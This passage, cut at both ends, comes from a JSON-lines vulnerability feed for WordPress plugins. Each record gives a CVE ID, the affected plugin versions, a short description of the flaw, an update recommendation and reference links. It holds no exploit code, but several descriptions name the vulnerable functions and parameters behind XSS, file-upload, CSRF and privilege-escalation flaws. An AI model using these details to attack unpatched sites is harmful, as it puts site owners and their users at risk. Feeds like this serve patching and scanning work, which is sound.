version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efd279c2-9e95-45bd-9494-fb53a6333c65?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efd279c2-9e95-45bd-9494-fb53a6333c65?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/social-login-handler\\\/google.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/social-login-handler\\\/google.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/social-login-handler\\\/facebook.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/social-login-handler\\\/facebook.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153667\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153667\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9599","slug":"ays-popup-box","versionImpact":"4.7.7","versionEndExcluding":"4.7.8","description":"The Popup Box  WordPress plugin before 4.7.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9e8a2659-7a6c-4528-b0b2-64d462485b43\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9e8a2659-7a6c-4528-b0b2-64d462485b43\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12770","slug":"wp-ulike","versionImpact":"4.7.5","versionEndExcluding":"4.7.6","description":"The WP ULike  WordPress plugin before 4.7.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e21f6a4e-f385-411b-8d91-0f38f9e6cdd3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e21f6a4e-f385-411b-8d91-0f38f9e6cdd3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4972","slug":"download-monitor","versionImpact":"4.7.51","versionEndExcluding":"4.7.52","description":"The Download Monitor plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on several REST-API routes related to reporting in versions up to, and including, 4.7.51. This makes it possible for unauthenticated attackers to view user data and other sensitive information intended for administrators.","recommendation":"Update to version 4.7.52, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9000c52-fdd7-43e2-ae6a-9f127c4a9fcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9000c52-fdd7-43e2-ae6a-9f127c4a9fcd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2822758\\\/download-monitor\\\/trunk\\\/src\\\/Admin\\\/Reports\\\/class-dlm-reports.php?contextall=1&old=2821522&old_path=%2Fdownload-monitor%2Ftrunk%2Fsrc%2FAdmin%2FReports%2Fclass-dlm-reports.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2822758\\\/download-monitor\\\/trunk\\\/src\\\/Admin\\\/Reports\\\/class-dlm-reports.php?contextall=1&old=2821522&old_path=%2Fdownload-monitor%2Ftrunk%2Fsrc%2FAdmin%2FReports%2Fclass-dlm-reports.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5858","slug":"infographic-and-list-builder-ilist","versionImpact":"4.7.4","versionEndExcluding":"4.7.5","description":"The AI Infographic Maker plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the qcld_openai_title_generate_desc AJAX action in all versions up to, and including, 4.7.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary post titles.","recommendation":"Update to version 4.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c8f1c29-b99d-4af0-9cc4-5d6179529ab4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c8f1c29-b99d-4af0-9cc4-5d6179529ab4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infographic-and-list-builder-ilist\\\/trunk\\\/qc-project-ilist-ajax.php?rev=3102295#L447\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infographic-and-list-builder-ilist\\\/trunk\\\/qc-project-ilist-ajax.php?rev=3102295#L447\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102754\\\/infographic-and-list-builder-ilist\\\/trunk\\\/qc-project-ilist-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102754\\\/infographic-and-list-builder-ilist\\\/trunk\\\/qc-project-ilist-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7879","slug":"wp-ulike","versionImpact":"4.7.4","versionEndExcluding":"4.7.5","description":"The WP ULike  WordPress plugin before 4.7.5 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 4.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ad1c40a-5e13-40b6-8652-c23a1f39abc2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ad1c40a-5e13-40b6-8652-c23a1f39abc2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7014","slug":"molongui-authorship","versionImpact":"4.7.4","versionEndExcluding":"4.7.5","description":"The Author Box, Guest Author and Co-Authors for Your Posts \u2013 Molongui plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.7.4 via the 'ma_debu' parameter. This makes it possible for unauthenticated attackers to extract sensitive data including post author emails and names if applicable.","recommendation":"Update to version 4.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/538e9ce3-2d48-44ad-bd08-8eead3ef15c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/538e9ce3-2d48-44ad-bd08-8eead3ef15c3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019084\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019084\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9649","slug":"wp-ulike","versionImpact":"4.7.4","versionEndExcluding":"4.7.5","description":"The WP ULike \u2013 The Ultimate Engagement Toolkit for Websites plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.7.4. This is due to missing or incorrect nonce validation on the wp_ulike_delete_history_api() function. This makes it possible for unauthenticated attackers to delete engagements via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fcb35f8-ed88-4440-8cdf-95c1f0028253?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fcb35f8-ed88-4440-8cdf-95c1f0028253?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-ulike\\\/blob\\\/fd5eb54948cc1af9c348530a3cbd89c5a4bc68d0\\\/wp-ulike\\\/admin\\\/admin-ajax.php#L78-L100\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-ulike\\\/blob\\\/fd5eb54948cc1af9c348530a3cbd89c5a4bc68d0\\\/wp-ulike\\\/admin\\\/admin-ajax.php#L78-L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168233%40wp-ulike&new=3168233%40wp-ulike&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168233%40wp-ulike&new=3168233%40wp-ulike&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7878","slug":"wp-ulike","versionImpact":"4.7.3","versionEndExcluding":"4.7.4","description":"The WP ULike  WordPress plugin before 4.7.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9166cf91-69e5-4786-a6a9-816db7d47b07\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9166cf91-69e5-4786-a6a9-816db7d47b07\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3488","slug":"sitepress-multilingual-cms","versionImpact":"4.7.3","versionEndExcluding":"4.7.4","description":"The WPML plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpml_language_switcher shortcode in versions 3.6.0 - 4.7.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpml.org\\\/category\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpml.org\\\/category\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpml.org\\\/documentation\\\/support\\\/wpml-coding-api\\\/shortcodes\\\/\",\"name\":\"https:\\\/\\\/wpml.org\\\/documentation\\\/support\\\/wpml-coding-api\\\/shortcodes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92c1bd85-5f81-4bb6-b6af-6cda85b91b9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92c1bd85-5f81-4bb6-b6af-6cda85b91b9e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6559","slug":"xcloner-backup-and-restore","versionImpact":"4.7.3","versionEndExcluding":"4.7.4","description":"The Backup, Restore and Migrate WordPress Sites With the XCloner Plugin plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 4.7.3. This is due the plugin utilizing sabre without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 4.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0500c57a-3983-46e4-92fa-85f7fd47eba8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0500c57a-3983-46e4-92fa-85f7fd47eba8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3118643\\\/xcloner-backup-and-restore\\\/trunk\\\/vendor\\\/sabre\\\/vobject\\\/bin\\\/fetch_windows_zones.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3118643\\\/xcloner-backup-and-restore\\\/trunk\\\/vendor\\\/sabre\\\/vobject\\\/bin\\\/fetch_windows_zones.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13906","slug":"gallery-plugin","versionImpact":"4.7.3","versionEndExcluding":"4.7.4","description":"The Gallery by BestWebSoft \u2013 Customizable Image and Photo Galleries for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.7.3 via deserialization of untrusted input in the 'import_gallery_from_csv' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 4.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gallery-plugin\\\/tags\\\/4.7.3\\\/gallery-plugin.php#L292\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gallery-plugin\\\/tags\\\/4.7.3\\\/gallery-plugin.php#L292\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249573\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249573\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76c5559d-f9dd-43cf-8c8e-07188b4edf7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76c5559d-f9dd-43cf-8c8e-07188b4edf7f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9378","slug":"yml-for-yandex-market","versionImpact":"4.7.2","versionEndExcluding":"4.7.3","description":"The YML for Yandex Market plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 4.7.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a463c5be-13d9-45d8-b43e-54ab188c151a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a463c5be-13d9-45d8-b43e-54ab188c151a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yml-for-yandex-market\\\/tags\\\/4.7.2\\\/classes\\\/system\\\/pages\\\/settings-page\\\/class-y4ym-settings-page-feeds-wp-list-table.php#L311\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yml-for-yandex-market\\\/tags\\\/4.7.2\\\/classes\\\/system\\\/pages\\\/settings-page\\\/class-y4ym-settings-page-feeds-wp-list-table.php#L311\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160483\\\/yml-for-yandex-market\\\/trunk\\\/classes\\\/system\\\/pages\\\/settings-page\\\/class-y4ym-settings-page-feeds-wp-list-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160483\\\/yml-for-yandex-market\\\/trunk\\\/classes\\\/system\\\/pages\\\/settings-page\\\/class-y4ym-settings-page-feeds-wp-list-table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11278","slug":"gd-bbpress-attachments","versionImpact":"4.7.2","versionEndExcluding":"4.7.3","description":"The GD bbPress Attachments plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.7.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f598cfc-4d41-4d22-95f0-47efdb7d07a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f598cfc-4d41-4d22-95f0-47efdb7d07a2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gd-bbpress-attachments\\\/trunk\\\/code\\\/front.php#L280\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gd-bbpress-attachments\\\/trunk\\\/code\\\/front.php#L280\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189863\\\/gd-bbpress-attachments\\\/trunk\\\/code\\\/front.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189863\\\/gd-bbpress-attachments\\\/trunk\\\/code\\\/front.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6792","slug":"wp-ulike","versionImpact":"4.7.2","versionEndExcluding":"4.7.2.1","description":"The WP ULike  WordPress plugin before 4.7.2.1 does not properly sanitize user display names when rendering on a public page.","recommendation":"Update to version 4.7.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c470edd-4b9b-461e-839f-f3a87f0060aa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c470edd-4b9b-461e-839f-f3a87f0060aa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3504","slug":"wp-google-map-plugin","versionImpact":"4.7.1","versionEndExcluding":"4.7.2","description":"The WP Maps  WordPress plugin before 4.7.2 does not sanitise and escape some of its Map settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/252484a6-96f0-43f3-a7dc-d20cc89ba119\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/252484a6-96f0-43f3-a7dc-d20cc89ba119\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3503","slug":"wp-google-map-plugin","versionImpact":"4.7.1","versionEndExcluding":"4.7.2","description":"The WP Maps  WordPress plugin before 4.7.2 does not sanitise and escape some of its Map settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83ddd432-309f-4ff5-974c-fdc9c67d1051\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83ddd432-309f-4ff5-974c-fdc9c67d1051\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3502","slug":"wp-google-map-plugin","versionImpact":"4.7.1","versionEndExcluding":"4.7.2","description":"The WP Maps  WordPress plugin before 4.7.2 does not sanitise and escape some of its Map settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd436064-e611-4a4b-a873-67ed6029c46f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd436064-e611-4a4b-a873-67ed6029c46f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9215","slug":"publishpress-authors","versionImpact":"4.7.1","versionEndExcluding":"4.7.2","description":"The Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors plugin for WordPress is vulnerable to Insecure Direct Object Reference to Privilege Escalation\/Account Takeover in all versions up to, and including, 4.7.1 via the action_edited_author() due to missing validation on the 'authors-user_id' user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to update arbitrary user accounts email addresses, including administrators, which can then be leveraged to reset that user's account password and gain access.","recommendation":"Update to version 4.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0506137-82e3-4988-9b23-370465a866c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0506137-82e3-4988-9b23-370465a866c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/publishpress-authors\\\/tags\\\/4.7.1\\\/src\\\/core\\\/Classes\\\/Author_Editor.php#L594\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/publishpress-authors\\\/tags\\\/4.7.1\\\/src\\\/core\\\/Classes\\\/Author_Editor.php#L594\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3169244%40publishpress-authors&new=3169244%40publishpress-authors&sfp_email=&sfph_mail=#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3169244%40publishpress-authors&new=3169244%40publishpress-authors&sfp_email=&sfph_mail=#file7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0479","slug":"woocommerce-delivery-notes","versionImpact":"4.7.1","versionEndExcluding":"4.7.2","description":"The Print Invoice & Delivery Notes for WooCommerce WordPress plugin before 4.7.2 is vulnerable to reflected XSS by echoing a GET value in an admin note within the WooCommerce orders page. This means that this vulnerability can be exploited for users with the edit_others_shop_orders capability. WooCommerce must be installed and active. This vulnerability is caused by a urldecode() after cleanup with esc_url_raw(), allowing double encoding.","recommendation":"Update to version 4.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50963747-ae8e-42b4-bb42-cc848be7b92e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50963747-ae8e-42b4-bb42-cc848be7b92e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6497","slug":"wordpress-simple-paypal-shopping-cart","versionEndExcluding":"4.7.2","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the automatic redirect URL setting in all versions up to and including 4.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac6201a1-7ca9-461b-b9ad-16407120dfae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac6201a1-7ca9-461b-b9ad-16407120dfae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3007737%40wordpress-simple-paypal-shopping-cart&new=3007737%40wordpress-simple-paypal-shopping-cart&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3007737%40wordpress-simple-paypal-shopping-cart&new=3007737%40wordpress-simple-paypal-shopping-cart&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6637","slug":"host-analyticsjs-local","versionImpact":"4.7.14","versionEndExcluding":"4.7.15","description":"The CAOS | Host Google Analytics Locally plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_settings' function in versions up to, and including, 4.7.14. This makes it possible for unauthenticated attackers to update plugin settings.","recommendation":"Update to version 4.7.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ec1fd03-f865-4f58-b63b-e70c0c7e701d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ec1fd03-f865-4f58-b63b-e70c0c7e701d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/host-analyticsjs-local\\\/tags\\\/4.7.12\\\/includes\\\/class-caos.php#L414\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/host-analyticsjs-local\\\/tags\\\/4.7.12\\\/includes\\\/class-caos.php#L414\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3008878\\\/host-analyticsjs-local#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3008878\\\/host-analyticsjs-local#file8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009011\\\/host-analyticsjs-local#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009011\\\/host-analyticsjs-local#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7438","slug":"masterstudy-lms-learning-management-system-pro","versionImpact":"4.7.9","versionEndExcluding":"4.7.10","description":"The MasterStudy LMS Pro plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'install_and_activate_plugin' function in all versions up to, and including, 4.7.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability is difficult to exploit due to timing requirements and environmental factors.","recommendation":"Update to version 4.7.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/masterstudy-lms\\\/changelog-pro-version\",\"name\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/masterstudy-lms\\\/changelog-pro-version\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ab970f5-35d1-43e9-891c-87a2a3e464c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ab970f5-35d1-43e9-891c-87a2a3e464c6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4800","slug":"masterstudy-lms-learning-management-system-pro","versionImpact":"4.7.0","versionEndExcluding":"4.7.1","description":"The MasterStudy LMS Pro plugin for WordPress is vulnerable to arbitrary file uploads due to a missing file type validation in the stm_lms_add_assignment_attachment function in all versions up to, and including, 4.7.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server, which may make remote code execution possible.","recommendation":"Update to version 4.7.1, or a newer patched 